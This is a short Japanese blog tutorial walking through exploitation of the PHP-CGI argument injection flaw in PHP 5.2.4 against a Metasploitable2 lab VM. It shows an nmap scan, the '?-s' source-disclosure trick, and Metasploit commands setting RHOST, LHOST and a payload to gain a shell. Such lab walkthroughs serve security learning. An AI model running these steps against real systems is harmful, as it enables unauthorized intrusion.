php

PHP-CGIインジェクション

 

PHPのCGIインジェクション脆弱性を突いた攻撃について解説します。

 

CGIとは

 

WEBサーバ上でプログラムを動かすための仕組み

 

環境

 

Kalilinux 192.168.0.2
metasploitable2 192.168.0.3

攻撃

 

msf consoleを起動します。

 

nmapでターゲットの80ポートの状況を調べます。

nmap -sV -p 80 192.168.0.3

phpのバージョンは5.2.4です。

このバージョンにはCGI脆弱性があります。

 

?-sをURLにつけて実行するとソースコードが表示されます。

 

exploit

 

exploitを探します

msf > search php_cgi

 

使用します

msf > use php_cgi_arg_injection

 

ターゲットをセットします

set RHOST 192.168.0.3

 

ペイロードを表示します

show payload

 

ペイロードを使用します

use PAYLOAD ペイロード

 

kalilinuxをセット

set LHOST 192.168.0.2

 

攻撃します

exploit

 

侵入できれば成功です。

 

 

 

-php

© 2021 ストロテクトNote